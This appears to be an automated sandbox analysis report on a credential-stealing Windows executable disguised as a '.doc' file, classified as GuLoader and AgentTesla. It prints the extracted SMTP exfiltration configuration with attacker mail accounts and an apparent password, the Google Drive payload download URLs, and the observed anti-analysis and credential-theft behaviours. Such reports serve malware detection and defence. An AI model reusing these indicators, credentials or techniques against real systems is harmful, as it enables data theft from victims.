Play interactive tour

Edit tour

Windows Analysis Report Fra FAC-ES101-2107-03806.doc.exe

Overview

General Information

Sample Name:	Fra FAC-ES101-2107-03806.doc.exe
Analysis ID:	1639
MD5:	18b804e21a3c1c80c195e7d20dc38477
SHA1:	9622e70cd6db56de3488e99cd18c5f51e54afb64
SHA256:	cbc14388711803d5a3f90396d4d33c9b3da952c37a5d919daed329cbd487c1b4
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Sigma detected: RegAsm connects to smtp port

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses an obfuscated file name to hide its real file extension (double extension)

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Drops certificate files (DER)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

Fra FAC-ES101-2107-03806.doc.exe (PID: 8172 cmdline: 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe' MD5: 18B804E21A3C1C80C195E7D20DC38477)

RegAsm.exe (PID: 2648 cmdline: 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2792 cmdline: 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2796 cmdline: 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 2880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comnoekon2ti@gmail.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1175708620.0000000002AB0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2796	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 2796	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 2796, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49768

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: Fra FAC-ES101-2107-03806.doc.exe.8172.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comnoekon2ti@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: Fra FAC-ES101-2107-03806.doc.exe	Virustotal: Detection: 61%	Perma Link
Source: Fra FAC-ES101-2107-03806.doc.exe	Metadefender: Detection: 34%	Perma Link
Source: Fra FAC-ES101-2107-03806.doc.exe	ReversingLabs: Detection: 53%

Antivirus / Scanner detection for submitted sample

Show sources

Source: Fra FAC-ES101-2107-03806.doc.exe

Avira: detected

Antivirus detection for URL or domain

Show sources

Source: http://mail.tccinfaes.com

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: mail.tccinfaes.com	Virustotal: Detection: 11%			Perma Link
Source: http://mail.tccinfaes.com	Virustotal: Detection: 11%			Perma Link

Source: 0.0.Fra FAC-ES101-2107-03806.doc.exe.400000.0.unpack

Avira: Label: TR/AD.Nekark.gblpr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014A9508 CryptUnprotectData,		27_2_014A9508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014A9C50 CryptUnprotectData,		27_2_014A9C50

Source: Fra FAC-ES101-2107-03806.doc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49756 version: TLS 1.2

Networking:

Source: Joe Sandbox View

ASN Name: CLARANET-ASClaraNETLTDGB CLARANET-ASClaraNETLTDGB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 188.93.227.195 188.93.227.195

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1fdhq835moktnu71nht8627dleqonv/1634123175000/00240525256395999725/*/1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-ak-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49768 -> 188.93.227.195:587

Source: global traffic

TCP traffic: 192.168.11.20:49768 -> 188.93.227.195:587

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5640613473.000000001DE54000.00000004.00000001.sdmp	String found in binary or memory: http://L3TFBaO3nLwUP4KRw.com
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: http://L3TFBaO3nLwUP4KRw.comt-
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: http://aSuCYu.com
Source: RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 0000001B.00000002.5646495418.000000001FF1B000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 0000001B.00000002.5646495418.000000001FF1B000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.27.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 0000001B.00000002.5640852632.000000001DE6C000.00000004.00000001.sdmp	String found in binary or memory: http://mail.tccinfaes.com
Source: RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	String found in binary or memory: http://r3.i.lencr.org/0)
Source: RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: RegAsm.exe, 0000001B.00000002.5640852632.000000001DE6C000.00000004.00000001.sdmp	String found in binary or memory: http://tccinfaes.com
Source: RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.27.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	String found in binary or memory: https://doc-04-ak-docs.googleusercontent.com/
Source: RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	String found in binary or memory: https://doc-04-ak-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1fdhq8
Source: RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-ak-docs.googleusercontent.com/q
Source: RegAsm.exe, 0000001B.00000002.5623186100.000000000107A000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 0000001B.00000002.5623186100.000000000107A000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/(&
Source: RegAsm.exe, 0000001B.00000002.5622662843.0000000000EF0000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe
Source: RegAsm.exe, 0000001B.00000002.5623186100.000000000107A000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSed
Source: RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSezw3D3zbFqIK2JnI8U
Source: RegAsm.exe, 0000001B.00000002.5640184321.000000001DDFE000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 0000001B.00000002.5640184321.000000001DDFE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1fdhq835moktnu71nht8627dleqonv/1634123175000/00240525256395999725/*/1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-ak-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49756 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Jump to dropped file

Source: Fra FAC-ES101-2107-03806.doc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_004016F4	0_2_004016F4
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_00401741	0_2_00401741
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_00401505	0_2_00401505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C41130	27_2_00C41130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C43A50	27_2_00C43A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C4BA70	27_2_00C4BA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C44320	27_2_00C44320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C4C7D0	27_2_00C4C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C43708	27_2_00C43708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00CA08F8	27_2_00CA08F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00CA6EA0	27_2_00CA6EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00D0BEE1	27_2_00D0BEE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00D0BFBB	27_2_00D0BFBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_0139DC28	27_2_0139DC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_013997F0	27_2_013997F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_0139D7D0	27_2_0139D7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_0139BE50	27_2_0139BE50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_013942F3	27_2_013942F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_013944F8	27_2_013944F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_01397E00	27_2_01397E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014AF9E0	27_2_014AF9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014A0040	27_2_014A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014A6068	27_2_014A6068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014AE7A4	27_2_014AE7A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014AAA68	27_2_014AAA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014A7228	27_2_014A7228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_014A721F	27_2_014A721F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_1DCE5E08	27_2_1DCE5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_1DCE4ACC	27_2_1DCE4ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_1DCE5D20	27_2_1DCE5D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_1DCE6AF1	27_2_1DCE6AF1

Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSaarede3.exe vs Fra FAC-ES101-2107-03806.doc.exe
Source: Fra FAC-ES101-2107-03806.doc.exe	Binary or memory string: OriginalFilenameSaarede3.exe vs Fra FAC-ES101-2107-03806.doc.exe

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Fra FAC-ES101-2107-03806.doc.exe	Virustotal: Detection: 61%
Source: Fra FAC-ES101-2107-03806.doc.exe	Metadefender: Detection: 34%
Source: Fra FAC-ES101-2107-03806.doc.exe	ReversingLabs: Detection: 53%

Source: Fra FAC-ES101-2107-03806.doc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Jump to behavior

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe

File created: C:\Users\user\AppData\Local\Temp\~DF9F977EEEC1DB0140.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@8/5@4/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2880:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2880:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.1175708620.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_00404871 pushfd ; ret	0_2_00404883
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_00404A8E push ebx; iretd	0_2_00404A5D
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_00403901 push FFFFFF9Dh; ret	0_2_00403903
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB26AD push es; ret	0_2_02AB26B0
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB64B8 push es; ret	0_2_02AB6510
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB64B5 push es; ret	0_2_02AB6510
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB2E8D push 0000002Ah; ret	0_2_02AB2E8F
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB429C push edi; retf	0_2_02AB42A0
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB6428 push es; ret	0_2_02AB6510
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB5A21 push FFFFFF83h; retf	0_2_02AB5A30
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB6503 push es; ret	0_2_02AB6510
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB511D push esp; ret	0_2_02AB5124
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Code function: 0_2_02AB2B4C push ebx; retf	0_2_02AB2B53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C4E5D8 push ds; iretd	27_2_00C4E6E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C4E5C8 push ds; iretd	27_2_00C4E5CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C4C6C1 push es; iretd	27_2_00C4C6C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C4C7C8 push es; iretd	27_2_00C4C7CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00C4D780 push ss; iretd	27_2_00C4D782
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_00CA1A20 push ds; ret	27_2_00CA1B1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_0139D7D0 pushfd ; iretd	27_2_0139DB7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_0139DB80 pushfd ; iretd	27_2_0139DB82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_0139DBD0 pushfd ; iretd	27_2_0139DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_01396A90 push edx; iretd	27_2_01396A92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_01396A89 push esp; iretd	27_2_01396A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_0139F2C1 push E9200622h; ret	27_2_0139F2C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 27_2_01397C88 pushad ; iretd	27_2_01397C89

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)

Show sources

Source: Possible double extension: doc.exe

Static PE information: Fra FAC-ES101-2107-03806.doc.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
